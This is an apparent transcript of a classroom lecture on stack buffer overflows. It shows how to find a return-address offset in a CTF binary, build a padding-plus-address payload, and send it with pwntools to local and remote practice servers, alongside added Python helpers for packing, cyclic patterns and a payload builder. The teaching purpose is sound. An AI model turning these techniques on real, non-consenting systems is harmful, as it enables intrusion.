So my plan, my plan is to talk about parameters in 64- and 32-bit programs. And I think that, you know, maybe, just maybe, showing you... I'm just making this up on the spot, so it might be completely crazy to do. So, another... okay. All right, that's cool. Static. Okay. All right, cool. So any time there's a moment like that, my mind does go to an intelligence agency; I'm probably a little on the paranoid side. So you want to, okay, oops, string, this string. So here's my plan: to talk about calling conventions in 64-bit and 32-bit, and dive through that. But after Monday, like I said, if you stare at this, it should be clear: the idea of the very first buffer overflow problems, which is a lot of the problems that you'll find when you go out to start training. If you go to picoCTF or pwnable.kr or whatever, something like that, if you wanted to start going self-paced, there's one little thing missing. And that's just kind of the toolset, the Python side of it. Which is like, how is it that I do this stuff in Python in order to send exactly the right characters, including the unprintable characters? So I was tempted to do a thing that I wasn't planning to do right now: just show you my toolchain for how to do remote exploits. So that if you feel like we're going too slow, I can keep going with the pace I'm at now, but if you want to be self-directed, because you agree with me that all the rest of your classes are useless and this one's fun, then you want to be able to go faster, and I don't want to bottleneck your speed, right? So that was my thinking: maybe I'm the bottleneck and you want to go faster than I'm going, on your own. I always like to read ahead and then go to the class, and then it validates what I know, rather than waiting like an empty vessel to hear it for the first time, or whatever, something like that. So what do you think: should I stay with my scheduled plan, which is calling conventions, or would you like to see the first exploit toolchain?
So then you can maybe self-direct yourself by going through problem sets and stuff. So basically, I can teach you pwntools, which is how I do this in competitions, or keep up with the intellectual pacing points. All right? All right. This is just so that you can self-teach. So not what I had planned at all. But I think, especially if you got stuck on PCP 3, this is necessary to do PCP 3, because PCP 3 was beyond what I taught. It's a very classic kind of opening problem. All right. So unplanned lecture, unplanned pwntools lecture. Okay, here we go. So what is pwntools? What's it all about? Why is it what we do? And I'm going to take PCP 3, which is a live one, and I'm probably going to violate their terms of service here. I might just do a little walkthrough of PCP 3 in my style. In fact, they already have a write-up on it. So this is what I wanted to show you. If you've looked at this write-up on PCP 3, this is a Python script. And basically this is what we do every time I need to go solve these problems, because I need to send things that are unprintable, of exactly the right length, things like that. I've been giving you the intellectual groundwork for knowing what to send and why, and how to figure out what, but not the how; the how is necessary. So I'll just do a little bit of how, then we'll go right back to work. Okay? So here's the how. We can totally do this from Replit or something like that. In fact, if you are going to do it in Replit, the one downside, if you want to do pwntools in Replit, I'll show you here, is that it's not such a nice environment as my pwndocker. I'm starting to lose a little faith in pwndocker; I think it's outdated now. My Replit is filled with, shipwreck, 300 Replit notifications. I don't think anybody else has got triple-digit Replit notifications. All right. I'm going to create a Repl. Actually, yeah. So far it's been tempting to make it like a C Repl or something like that.
But for pwntools, I want it to be a Python one. And a Python one because this is, after all, a class in Python, even though it doesn't feel like it. So here is all I'm really here for: if I need to install something in Python in Replit, there's this little modules cube. It doesn't exist unless I made it a Python space. And if I click that, it will let me add modules. Different. Is it because I'm so zoomed in? I've done this 100 times, but this is not the interface I get. No. Oh, it's packages, not modules. They have two cubes. Dummies. Modules is not what I'm here for; I'm here for packages. Yes, this is what I'm after. And I can type pwntools. I need this sort of Python CTF framework and exploit development library. That's what we're here for: pwntools. And so that'll get it for you in Replit. If you are in some other place, you can do pip install pwntools. If you don't have pip, then you can go install pip. This will be like, oh, you've already got it. Oh, okay. All right. Fine. Requirement already satisfied. Yeah, cool. So that was pip install pwntools. Or if you're in Replit, you can go to these packages plus over here. Okay, now what is pwntools and why do I use it, et cetera, et cetera. All right, so here is the problem that I gave in PCP 3, intro_bof. Now we just learned about calling conventions, and those calling conventions are how this thing will be exploitable. So let's take a look at this main. Do you guys see the vulnerability? scanf? %s. scanf is okay if I say it with a limit, if I put in the character count, whatever. But here this scanf is going to do %s, which means it will let me write an arbitrary-length string onto the stack. Okay? Now what is the danger of writing an arbitrary-length string onto the stack, 32 bytes behind the base pointer? All right? And let's take a look at the stack. So let's go right up until that scanf, and let's inspect the stack based on what we learned Monday.
Okay, so where's the base pointer? RBP. So here, that's the base pointer. Can you guys see that quickly? And I'd say, if I'm looking at this, that it ends in ...8090. And here's sort of my view of the stack. All right? If I want to see more of that, you can kind of navigate around the stack, up and down. I don't have enough arrow keys, but J and K. All right? So we're writing at 32 bytes behind the base pointer, which means that I'm going to start writing here, and whatever it is I write is going to fill this up this way, and it's going to go all the way up here. Now, based on our knowledge, what do you think these eight bytes represent? Eight bytes just beyond the base pointer, in main? It's going to break your intuition. But from intellect only, what should be just behind the base pointer? So what not? This is the base pointer, pointing right here. So the saved instruction pointer. And yes, that is behind. We're not just behind what ends up on the stack when I'm in a function call. So why are they saying that? They're saying, well, we know that you're going to push something onto the stack so that I know where to go back to. That first one there is saying, hey, this return address is back here, but the base pointer is actually pointing right here. Why is the old base pointer also on the stack? Well, that's the first thing that happens every time I jump into a function. I need two things to go home: I need a plane ticket home, and I need the keys to my house. So the old base pointer is how I get access to my old variables again, and the old address is how I know where to start executing again when I go back to the function I was in. I have the old base pointer and then the return address. There wasn't a lot of nodding. There's two pointers. One of them is the old base pointer, which is so that I can restore my local variables. And the other is my old address pointer, so I know where to jump back to in the middle of that function.
They're both eight bytes, or four bytes on 32-bit. That's important: on 32-bit the addresses are four bytes, not eight; on 64-bit, eight bytes, not four. The old base pointer, all the old stuff, is on the stack. EIP is pointing into some completely different address space, where the instructions are. Normally we don't have the same segment of memory for reading and writing as we do for reading and executing. So whenever you look at permissions on something, you're going to see read-execute but no write, or read-write but no execute. The stack is in a read-write segment normally, and the opcodes are in a read-execute segment. If I have read-write-execute, then it's only a matter of time before I've hacked it. And that's actually the next type of exploit we'll do: shellcode. That is, you're going to provide your opcodes and we're going to jump to them and execute. The reason I'm making you do an assembly thing, even though it's a Python class, is because when you are developing a malicious payload for millions of dollars, a lot of times what you're doing is writing shellcode in a really constrained environment. So you just kind of need to know how to put just the right commands in place so that you can have actually executable shellcode, if the ones that you download from shellcode.com or whatever don't work. So a lot of times you're in problems where you have to make shellcode, but everybody has to be given... all right, fine. You just end up in weird constrained environments. So, okay. Where am I here? All right, so with that in mind, what are these eight bytes? They should be RBP. That is the old base pointer. Who the hell is an old base pointer whose address is one? That's like my telephone number. What a weird value to have there. Why is that weird value there? Because I'm in main. You know what happens outside of main? We don't talk about what happens outside of main. That's the setup. Yes. We all have the song in our heads now.
But, you know, we don't talk about what happens. It's like Bruno. I've seen one tech talk that talks about what happens outside of main, and it was a really fascinating talk. But you could spend a whole career and never have to worry about what's outside of main. It's all the things that the compiler does to sort of set things up, or whatever, out there, and in that land they don't use local variables like you and me. It's not for us plebeians who need the operating system to carry our local variables, or whatever; out there they're the bosses of everything, and they've just got completely different conventions outside of main. Right? Now, with that in mind, what are these eight bytes? The base pointer is here, RBP. That's basically where you are. The base pointer represents my step. What's after the old base pointer, and why? Instruction pointer. And that's going to be, when I'm done with main, where it's going to go back to after main returns, to do whatever weird things happen outside of main. Okay? So if we're in a malicious mood, which I am, just like, you know what? No more theory. Let's start hacking some crap. Then I need to overwrite that. Okay? So let's say that you're in the mood to do your first malicious activity. All right, great. You want to control the instruction pointer so that you can take over control of the CPU. Okay, where do you want to point it? I'm a virgin at this; I have no idea what I'm doing, you know. So the first thing you need to do is have in your mind a target that you're going to care about. All right, I'm going to hit capital P to get rid of that, so I just have a little more space. One of the first things that I might do when I go to reverse a program is I want to see what other functions exist here. And in this case, it's a baby problem. And baby problems often have what I would call a win function: a function that they've provided that they never call.
And if you could just get the instruction pointer to that function, it'll just give you the flag. Okay, cool. So win functions exist, which don't exist in reality per se. Although, if you've ever heard of one_gadget, yes, win functions do exist in reality, which is that, you know, your glibc that runs the world, which, as I said, if you delete it, your computer will be bricked, has in it often as many as three addresses where you can jump to that address and it'll spawn a shell. Where you'd like just a single address, a shell-spawning thing. Okay. Why? Because sometimes you need to spawn a shell; that's the thing that glibc needs to be able to do for you. And so here's where you go if you want to spawn a shell, right? Okay? So win functions do exist in the wild, but in the CTF context it's basically saying, hey, I'm really just laser-focusing on one type of exploit, which is a simple buffer overflow, which compilers know about. They don't exist in the wild the same way that they used to when these things started. This is about a 20-year-old kind of history that you're learning here, maybe a 30-year-old history. And when I described this class in April, the first half of the class, it's really interesting and you're all going to pay good attention to the first half. But they're kind of toy problems. Just like when you're doing calculus or something: I fill up a bathtub with hot water and cold water and I want to know what temperature the water comes to. Nobody is going to do that. It's a toy problem in order to teach a concept. The back part of the class, the last quarter of the class, it's real. And all the lessons from these toy problems are real. But you're all going to get really confused. I hope not, or whatever, but it is literally like trig substitutions, integration by parts and stuff, or whatever. These are all the trig functions. The real thing is really confusing. That's right.
And I hesitate about whether or not to torture you that way. So your grade will not depend on whether or not you make it past the toy stuff. But I'm going to take the time to show you the real thing, because otherwise the toy stuff is... not useless: you learn x86 better, you get good at problem-solving, you build a little grit, that kind of thing. Oh, that's good. Metacognition on that; that's great. But the real thing, if you're actually going to make millions from it or whatever, you've got to do that real part. The real part is harder, but it's the same principle. So we're teaching with principles. The principles are: move the instruction pointer; have a target of where; and what I call a write-where. That is, what's my strategy, how am I going to take over the instruction pointer? I'm going to drop arbitrary data into the address space of this program, right? In this case, we have a buffer overflow. All right? Those almost don't exist in the wild anymore. Maybe they do. If you go to cve.org and you just look for buffer overflow... In fact, I saw a cyber headline just the other day where VMware was getting hacked all around the world, or whatever, from a patch that came out in 2021. They should have patched their dumb shit, but they didn't. And so VMware's getting hacked. And the hack is a heap overflow. Okay, that's very similar to a buffer overflow, just in a different place. All right, so it can exist; it's just that typically compilers are good enough to protect you from that. Blah, blah. What am I saying? I'm saying this: look at the name of that function. read_flag. Okay? If you're doing a capture the flag, I want to run that function, right? One other thing to note: if it's a function like this, it says read_flag. In this case, I see flag.txt and a file open, right? Which means that I'm going to hack myself locally, which again is not a big deal. It's like running an XSS against myself. Who cares? Can I do an XSS against the admin?
So I need to make a fake flag when I see this. Otherwise it'll fail when I get into read_flag: all my stuff is correct, but I don't have a flag to read. Hack number one. Where's the base pointer? ...8090. Just before scanf. Where's scanf going to write? It's going to write here. All right, so question number one on this is: how many bytes do I need to write before the next byte will corrupt the return address? How many bytes do I need to write? How long does the string we provide need to be before I start to corrupt this return address? Seven? Here we go: 1, 2, 3, 4, 5, 6, 7. Nope, I'll stop there. Seven chunks, so seven times eight, or... no, wait, but that's fine. All right, so I went five chunks of eight. So this is eight bytes, eight bytes, eight bytes, eight bytes, eight bytes. And then here, okay. Now, if I don't know, how do I know that I start writing here? I don't know if anybody's wondering that. Are we clear enough? It's sort of mastery task B, to kind of see that at this point. I went the wrong way, my scanf. Actually, one of my topics for today, which I was planning to do, is calling conventions: how do calling conventions work, registers. The registers RDI, RSI. RDI is the first argument, RSI is the second argument. Okay, so what was loaded into RSI? var_20h. var_20h, hex 20, which is 32 bytes before the base pointer. So if I'm hacking, if this is a real CTF, I'd have this done in about 5 seconds, maybe 30. And I'd have it done because I'm going to look at this one, see that 0x20, I'll see that scanf %s, hunt for a win function, find the address of the win function, and be like, okay, cool, I know it's a 40-byte payload. I don't even have to inspect or whatever. But for the first time, I might actually want to set a breakpoint right after the scanf and hit continue. And it says "Feed me". I'll just feed it some stuff. And I just want to look at the stack to see where is my thing and where's my target.
So if I don't want to do the math, I can just sort of put a thing in and see where is my payload that I clearly recognize as mine. You can see ABCD, and it added a null byte at the end of that. So this is where I start writing, just as I predicted. But if you couldn't follow along with the prediction, then you just do it and see; you don't have to actually do the math. And now we know what we need. How many bytes do I need before... I taught the whole class, say it in unison. Zero bytes. Now, zero bytes will be like, this is where I start writing. I want to know how many bytes do I write until I get there. So you're saying zero from here, and it starts growing, baby. But I've started here. 40. 40. That wasn't used, fine. All right. All right, 40 bytes. Okay. Now, next, what address do I want to put in? Yeah, I want the address of the function. Okay. Now, what's the address of the function? I can kind of just scroll up here and find it. I'll show you some cool tricks for finding it. Okay? Control-C. All right, I now know what I need to know to hack it. All right? Now I know that I need a flag.txt, a fake flag, whatever. All right. So I know I have a flag.txt for it to open. All right, so now the question is, how do I send it this address? Sorry, I'll type clear. How do I send it that address? I can't just type it in and have it parse the malicious address for me. It's not made for the hacker. The UX isn't there to make my life easier. Okay? So how on earth do I send a valid address that the machine is actually going to interpret correctly? That's where Python comes in. Here's Python. I go into Python 3, or whatever version of Python you've got, or whatever. And I almost do this reflexively, almost every time I start Python: I run this line, from pwn import *. All right. This gave me a whole lot of really cool tools. Probably I should just import pwn, and then I can kind of see all the tools by doing tab completion. Tab completion.
Maybe there are so many, it's like frozen now. Okay. There we go. These are all the wacky tools that are in pwntools. All right. CRC, De Bruijn sequences, format string payloads and GDB debuggers and Linux things and MD5 and whatever, and ROP gadgets and chains and sums and SSH things, et cetera, et cetera, and unpack and whatever. I'm in IPython. pwn dot tab. I love IPython for self-exploration. In fact, in this open-source community project I spent a lot of time on this weekend, you young kids are all like, we should refactor with the best principles. No, no, no. Give me tab completion on a global object. Because I want to go fast. My time is precious. I don't want to have to just know and reference docs, or use VS Code. I'm a hacker on a server remotely. Anyway. Sorry, I didn't mean to make fun of your whole generation. But don't suck, that's all. I just don't want you to suck. Like, I want you to make the world not suck, and codebases be cool, not bad. Okay? So step one, I'm going to say p = process('./intro_bof'). BOF stands for buffer overflow, by the way. Although, yeah, buffer overflow. Okay. So here's the idea of pwntools, or whatever: it takes the place of my terminal. Normally I would just run ./intro_bof to be interactive, or whatever, something like that. By the way, it does give me a process ID, which means that I can also attach a debugger while sending weird payloads. I'll show you how to do that soon-ish, once you start doing more hacking. This is for you to go do your own hacking at your own pace. Everybody is equal at P2, P3 after this; that's all. Okay. Now, I can type p.recv() and I get nothing. Nothing, I tell you. All right, fine. p.close(). p = process('./intro_bof'). All right, now the address I want to write is this one. Here's a cool tool that pwntools has. This, by the way, in Python is just a number, right? 0x whatever, that's going to evaluate it as an integer.
If I have an integer which is an address, I want to format it as a string payload for a 32-bit processor or a 64-bit processor. pwntools has a cool little kind of pack-my-address tool. And this is that address written as four bytes of a 32-bit little-endian address space. Here is the 64-bit version of that address. Now you'll recognize it. The address has... okay. Thank you. Yeah. All right. d6 here, 11 here, 40 is actually here. But hex 40 is actually printable, so it looks like an ampersand. And then 00, 00, 00, 00, 00. Okay. That's an eight-byte address in little-endian order. Okay? That's kind of what I'm here for, is to just get that, really. Yeah. Yeah, the integer version is fine. So if I do p64 of this number, it'll make it into a string. But it must be an integer. Don't pass it a string or something. Okay? I also have the opposite, u64. We'll take a leak. We're going to create leaks soon. This class has a lot of p jokes, fine. So once we get a leak, we can undo the leak by cleaning it up, or whatever, by doing u64: undo the 64-bit address, or whatever, and put it back into something that I can recognize, like that. Okay. Okay, so let's make a payload. What's my malicious payload? 40 bytes of junk plus the address of the win function. So these are the 48 bytes I want to send to that program to hack it. Okay, that's all I need. Now, I've already opened the program, so I can send the payload. And there is my fake flag. So I made flag.txt. I didn't call it fake_flag; it's called a fake flag. Fine. But who cares, it's fake. But what happened when I did that is we overwrote the buffer. We totally smashed the stupid old base pointer that, like, you know, for once I leave main... but that's okay. You're not going back to where you came from. You're going to where I tell you to go. You're going to the read_flag function, and it could totally crash after the read_flag function. I don't care.
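The frame arithmetic from the stack walk above (buffer at var_20h, then the saved base pointer, then the return address) and the p64/u64 packing just described, as an added example that is not from the lecture and does not use pwntools: p64, p32 and u64 are re-implemented here with struct so it runs anywhere, the 0x20 buffer offset is the var_20h radare2 showed, and the target address 0x4011d6 is reconstructed from the "d6, 11, 40" bytes read off the screen, so treat it as a placeholder rather than a value to reuse.

```python
import struct

# Constructed values for this example. The buffer offset is radare2's var_20h from the
# lecture; the address is a placeholder assembled from the bytes read aloud (d6 11 40).
WORD_SIZE = 8                 # 64-bit target; a 32-bit target uses 4-byte words
BUF_OFFSET_FROM_RBP = 0x20    # buffer starts 32 bytes below rbp
READ_FLAG_ADDR = 0x4011d6     # hypothetical address of the win function


def p64(value):
    """Pack an int as 8 little-endian bytes (the job pwntools' p64 does).
    Packing a string makes no sense, so refuse anything that is not an int."""
    if not isinstance(value, int):
        raise TypeError("p64 expects an int, not %s" % type(value).__name__)
    return struct.pack("<Q", value)


def p32(value):
    """32-bit sibling: a 4-byte little-endian address."""
    if not isinstance(value, int):
        raise TypeError("p32 expects an int, not %s" % type(value).__name__)
    return struct.pack("<I", value)


def u64(data):
    """Inverse of p64: turn 8 leaked little-endian bytes back into an int (pwntools' u64)."""
    return struct.unpack("<Q", bytes(data[:8]))[0]


def return_address_offset(buf_offset_from_rbp, word_size=WORD_SIZE):
    """Bytes from the first byte of the buffer to the saved return address.

    Going up from the buffer: [buffer ...][saved rbp, one word][return address, one word],
    so the return address begins buf_offset + word_size bytes into the write
    (0x20 + 8 = 40 here, which is why the lecture's padding is 40 bytes).
    """
    return buf_offset_from_rbp + word_size


def build_payload(buf_offset_from_rbp, target, word_size=WORD_SIZE):
    """Padding up to the return address followed by the packed target address."""
    padding = b"A" * return_address_offset(buf_offset_from_rbp, word_size)
    packer = p64 if word_size == 8 else p32
    return padding + packer(target)


if __name__ == "__main__":
    payload = build_payload(BUF_OFFSET_FROM_RBP, READ_FLAG_ADDR)
    print(len(payload), payload)          # 48 bytes: 40 of padding + 8 of address
    print(hex(u64(payload[-8:])))         # the last 8 bytes round-trip to 0x4011d6
```

The little-endian order is the whole point of p64: the byte the lecture sees first on the stack is the low byte (d6), and 0x40 shows up as a printable character because it happens to fall in ASCII range; the high bytes of a small address are the zeros that follow.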
Whatever, I got my flag. One of the things you kind of get aware of as a hacker is, when will it crash from my crap? It will crash eventually. But will it crash after I've accomplished what I want? Cool, okay, right. Okay. So that's pwntools. And that will unlock you being able to go play with real problems out there. Now, there's one part missing, which is that we need to do this on their remote server. I don't need to hack myself; I need to hack them. So I'm going to close my process. Now, if you go to that problem on ImaginaryCTF... All right. You got you. I swear I had it, like, at home or something. You need to go to a business lunch? It's cool. All right. So you'll see that they have a write-up for you, right? Like, ImaginaryCTF is here for the same reason I am: to make you more awesome, you know? And so here's your write-up. Now, they do some pretty cool shit. Sorry, I didn't need to curse there. It is so cool. Some cool stuff. This program is running on that port. All right. Now, hacking myself locally is not as interesting as hacking them. So if I want to hack them, I can run that little script here: netcat, their domain and their port. Okay, hi there. Hi. You'll notice that their "Feed me" came in later. There's a dumb reason for that. I could tell you, whatever, blah blah, but I've made that mistake in a CTF. People were like, well... I'm sorry, it's my fault, I didn't flush the buffers. All right, fine. So flush your buffers when you're running the CTF. But again, they're being nice to let us hack them at all. So they made it slightly more annoying to hack, fine. Okay. But that is our program running on that port, and it receives text. Okay, so how do I now send the same payload from pwntools? Instead of process, I replace process with remote.
And let's suppose that I don't know how to work any of this junk, because, you know, you can just find a command and hit question mark and it will give you documentation on how it works. So this thing will take in a host and a port. And there are even examples: r = remote(this, that). So this is the port number and that is the IP address. Okay, cool. In our case, we have this: well, the second argument is the port. The first argument is netcat; I don't really care about that, but this is their domain. Okay? I've now opened this connection to them. And I can say p.sendline(payload). All right, yeah, that was the flag. I cleared it real quick. You can go back and pause the recording whenever and cheat. More ImaginaryCTF points for you. But this is the part that's interesting here, right? We already did that. It's really that now it's the same process hacking myself as hacking them. And so the interesting one was this. All right, so that's pwntools. It's just a Python package that lets me interact with binaries, either remotely or locally, and send them a little malicious payload, whatever. So that's enough for you to go and solve real problems that you find in places that train. Let me show you some places we can go train. We did really well in the CTF last weekend. And the only problem that wasn't solved was a pwn problem, which means that this class is the thing keeping us from being the number one team, right? So go practice, get good at that, so that we can be the number one team. So if you go to picoCTF, picoGym, sorry, I muted myself, didn't mean to, go practice, and click Binary Exploitation. All of these problems are available. Here's buffer overflow 0, and it's running on that port. And you can grab down the binary, connect, exploit, get your flag, whatever. And they even show you the source code. So that's nice. We've got that going for us. I don't want to run it in... a text editor is fine.
So here's their source code. They do flush their stuff, or whatever. They read the flag in. All right. This is all just sort of setting-up stuff, and here's flushing, whatever. Here's the vulnerable part. I'm going to ask for 100 characters from me with the gets. And then I'm going to call vuln. And I'm going to copy your input into a 16-byte buffer. Okay, cool. So that's that. All right. Oh, and look at this: print flag. Okay, cool. So all I really need to do is jump here. So there's a win function that will print the flag. But oh my gosh, oh my gosh. Look at what nice people they are. They set this up as a signal handler, which means that literally you just have to crash the program and they'll give you the flag. It's even easier. You don't have to do any math or anything like that. You just have to write more than 16 characters, any characters, and they'll give you the flag. Okay. That is baby. Yeah. That wasn't... he said I'd have to do 16 characters, and then right after the 16 begin with the address of the function. As the writer says, he's wrong, so correct him. He's wrong, so correct him, right. It's almost right. 16 bytes will put me at the old... at the current base pointer. And then what do I need to do? Extra bytes for the old base pointer. The address I'm targeting is always four or eight bytes behind the base pointer: four if it's 32-bit, eight if it's 64-bit. Then I get the address. Okay, cool. But here's the important part. I have now just unlocked 37 problems that you can go solve using pwntools, to try and mess around with this stuff. And it's really the calling conventions that are why we know that there's a return address there. So we had to wait until Monday to be able to tell that full story. But now you can go hack almost all the baby early pwn problems; they're just buffer overflows in some flavor or another, or whatever, something like that. A lot of the baby ones. Okay, cool, cool, cool. Here's buffer overflow 1.
A little bit harder. Okay, cool. Now they say it's not running. So you click Launch Instance and they'll set up a port number for you, because they don't leave it running; 2047, something like that. Okay, cool. All right, so go do some practice problems like that. Similar ones on ImaginaryCTF, whatever, et cetera. Okay, there's a couple of extra things in pwntools that are awesome, that are worth saying. This little write-up uses a pwntools thing that will analyze an executable Linux file, an ELF, which is almost everything we're working with. I wouldn't mind doing versions as, plus, ARM executables or something, or whatever. Anybody says, why do we keep using these unsafe languages like C, or Linux, or whatever? When x is in C, or not? The unsafe languages, they're probably safer than all your rusty crap. I know you'd think Rust is safer, but it just has fewer eyeballs. Right? So anyway, fine, fine. But we're going to work in an executable file, an ELF, and this cute little trick here gives me this handle, exe, that I can kind of use as an in-Python version of radare2. Now, what am I saying there? Take a look at what they do here. They didn't do an analysis; you do see p64. But what's the integer they put inside of that p64? read_flag. We know there's a function called read_flag in there. How did they find the function read_flag? Well, this little handle is basically a reverser for me in Python. So they're saying exe.symbols['read_flag']. That's a dictionary lookup: a dictionary of the address in that binary of each of its symbols. One of those symbols is the win function called read_flag. Don't even need to use r2. Just do it all in Python, right there. Or, I want to see the radare. I want to step through it. When you get this wrong, how do you debug yourself? Right now? So you guys will be frustrated by this when you go to solve one of these and you're wrong. Because it's going to be just an off-by-one error.
You're going to have 32 instead of 40, or 16 instead of 24, whatever, something like that. So I need to show you how to debug yourself, so that you can figure out what you got wrong. Because computer science is all about the speed with which you can fail. Fail faster. Fail fast, that's our job. So you guys will suffer from this when you first start to do this: you're just going to have to go back to the whiteboard every time you get it wrong and just hack and guess. And that's going to be really annoying, and that's not actually progress. That's just sort of hoping. So here's hoping you get it right with your first try, but you won't. So I'm going to show you how to debug it. Fine. But this is cool shit. I can look up the symbol read_flag. I now have the address of that function. And I can put it in here, send my payload. And then this last part, interactive, that gives me back the shell control. So like, if I have popped a shell on them, I do interactive, and let me be the driver again instead of going through Python. So I'm sending and receiving and things like that. But what I really want is just to come back into the driver's seat. Some crappy characters that I can't say. More like that. I can write cyclic here. That is basically their version of just putting in 40 A's. That's a De Bruijn sequence that never repeats. And so just in case something crashes, you run cyclic. You can see how many bytes deep it got with your sequence. Whereas if I put in all my A's and it crashes because it's trying to read an address at AAAA, it's going to fail, and I won't know how deep into my sequence it is reading, right? So if I run cyclic and I'm wrong, I can at least look at the error message. I might see the address that it's trying to interpret and know that I'm off by one. Okay. The question now. So that's pwntools.
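The cyclic / De Bruijn trick just described, as an added example that is not from the lecture and does not import pwntools: cyclic and cyclic_find are re-implemented here (same lowercase alphabet and 4-byte subsequence length that pwntools defaults to), so you can see why a crash address like 0x6161616c tells you the offset while 0x41414141 from a wall of A's does not. The crash value in the usage is constructed for the example.

```python
from itertools import islice
from string import ascii_lowercase


def _de_bruijn(alphabet, n):
    """Yield a De Bruijn sequence B(k, n) one character at a time (FKM algorithm):
    every length-n string over the alphabet appears exactly once, so any n-byte
    window you see later identifies exactly one position in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, alphabet=ascii_lowercase, n=4):
    """The first `length` bytes of the pattern: aaaabaaacaaad... like pwntools' cyclic."""
    return "".join(islice(_de_bruijn(alphabet, n), length)).encode("ascii")


def cyclic_find(subseq, alphabet=ascii_lowercase, n=4):
    """Offset of an n-byte window in the pattern, or -1 if it never occurs.

    Accepts the bytes themselves, or an int read out of a crash report: the register
    holds the bytes little-endian, so the low n bytes of the int are the window.
    """
    if isinstance(subseq, int):
        subseq = (subseq & ((1 << (8 * n)) - 1)).to_bytes(n, "little")
    if isinstance(subseq, str):
        subseq = subseq.encode("ascii")
    subseq = subseq[:n]
    window = b""
    for i, ch in enumerate(_de_bruijn(alphabet, n)):
        window = (window + ch.encode("ascii"))[-n:]
        if window == subseq:
            return i - n + 1
    return -1


if __name__ == "__main__":
    print(cyclic(40))                      # b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaa'
    # Constructed crash value: suppose the debugger shows the program trying to
    # return to 0x6161616c, i.e. the bytes 'laaa' in little-endian order.
    print(cyclic_find(0x6161616c))         # 44: the return address starts 44 bytes in
    print(cyclic_find(0x41414141))         # -1: a wall of A's carries no position
```

The usage note in one line: send cyclic(N) instead of N A's, read the faulting address out of the crash, and cyclic_find of that value is the padding length you were guessing at, which is exactly the off-by-eight you would otherwise be hunting with a whiteboard.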
That wasn't what I expected to talk about today, but I just think that should allow you to go at your own pace and enjoy and explore rather than waiting for me. My whole model is not to be the sage on the stage, but to be your personal trainer. And some of you are ready to fly faster because your other classes just aren't that interesting, whatever. Okay? So you don't have to wait for the class if you've got the energy. Alright, one last thing I want to say, then... I've got five minutes. So here's one more thing I want to say. Alright, one of the other tools that kind of comes along when I install pwntools and stuff and radare2 and all that is checksec. Okay. Now this is going to touch on some of the other mastery tasks here. Oh wait, that's my task for today: my well-secured program. But let's contrast my well-secured program with intro buff. Okay. That's a lot more red for intro buff. I don't like the way this prints; it's supposed to make a nice little table. Maybe I can make my table better or something, but can you guys read that at the back? It's a little bit low, right? I'll hit clear and do the check again. Okay? This checksec program runs tests to see how fortified the binary is. Alright, my goal in this class is that by the end you can exploit a program where there's no obvious bug by the developer. Fully fortified, fully green here, on the latest version of glibc. That's my goal. That's the place where I earn the title "secure software design". I'll grant that if you don't pay attention to that last part of the class, then you're right in thinking this is not secure software design, this is x86 exploitation. But I go the opposite way, which is to say, this is the only way to do secure software design. I don't trust anybody who hasn't seen the ways that you can trip up a program. Because if you don't know how to trip up the program, you aren't aware of the sorts of subtleties that you should be paranoid about.
And you end up as a dogmatic rule follower, which makes the world worse when you go to make me write all of my code in Python 3 and Angular 2 or whatever, saying that you understand it, right? Frustrating people. So this is fortification. If you look at the mastery tasks, you'll see these words show up throughout those mastery tasks, even though right now you don't know what all those words mean. The one I'm here to talk about is position-independent execution. Alright? So this one is red there, which says no position-independent execution. Do you know what that means? If that is red, it means that my functions are at the same address every single time. Our whole payload that we just did worked by knowing the address of that function. But I'm going to show you, I'm going to write a little program real quick. I've got two minutes. I can do it, I can do it. fun.c, make fun, run. Alright, let's copy prog.c to, like, tia.c. Okay? Okay. Actually, let's put that back. That's cool. I can have a vulnerable function. Okay? I'm just going to do printf of the address of vuln, actually main. Hell, I'll print a couple of addresses: main, vuln, and even printf itself. Alright, so when I run this thing, it reveals to me the address where main is, where my subroutine is, and where printf itself lives. Yeah. Alright, I'm going to put three of those on the screen. Cross your eyes and tell me what changes from call to call. So what can we say about these addresses? Every time I execute it, the middle changes; the last few nibbles, that's a byte and a half, isn't it, stay the same. The middle changes every time. The top is the same, the bottom is the same, the middle changes. Okay, that's address randomization. Now, that win function, not only is it a silly toy problem, but when they went to make it, they put in the flag. I don't know if I'm going to get this right. I think it's -no-pie. Yes. Okay. Now take a look at how my addresses vary again. Okay.
Now, what was changing from execution to execution? Speaking in the last few seconds of class: the function addresses stay the same every single time. This is what happens if I turn off position-independent execution. Now, if you think about this, what you guys are learning is actually the history of hacking and defenses. What I'm showing you is like, here's where we started hacking, and here are the defenses they made, and then here's where we took the hacking next, here's where we kept taking the hacking. So you're going to see this dogfight until you catch up to modern attacks. That's the plan. Say, okay, here's how you can hack in the 90s. Here's how you can hack in 2000, 2005, 2010, 2020. But note the printf that is changing. So even though I made it less safe, my printf will always be random because it's in somebody else's library. They're not doing that. Well, no, no. Okay. So just to say, as you go to play, addresses might move on you. But if you see that address starts with 40-whatever, then that one is fixed. That address is a nice, reliable address; it isn't moving. If it starts with 55, that's a randomized address. It's going to get moved on you. That's pretty cool. I was asked for help with the keystore really quickly. Yep. So I have some time.
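Added illustration, not the lecture's script or pwntools' own code: plain-Python stand-ins for the pwntools calls the lecture leans on (cyclic, cyclic_find, p64, the exe.symbols lookup) and for the ELF e_type check that checksec's PIE row is based on. It does not import pwntools, so it runs offline; the real script would use from pwn import *, ELF('./prog').symbols['read_flag'], remote(host, port), sendline() and interactive(). The symbol address 0x401196, the crash value 0x61616163 and the two ELF header byte strings are constructed for the demonstration.

```python
"""Plain-Python stand-ins for the pwntools pieces named above (cyclic,
cyclic_find, p64, ELF(...).symbols) and for the e_type check behind
checksec's PIE row.  Added illustration: not the lecture's script, and it
does not import pwntools."""
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"  # pwntools' default cyclic alphabet
N = 4                                      # pwntools' default subsequence length
ET_EXEC, ET_DYN = 2, 3                     # ELF e_type values


def de_bruijn(alphabet: bytes = ALPHABET, n: int = N):
    """Yield B(k, n): every length-n string over the alphabet occurs exactly
    once (standard Lyndon-word construction), so any n bytes seen in a crash
    pin down a unique offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
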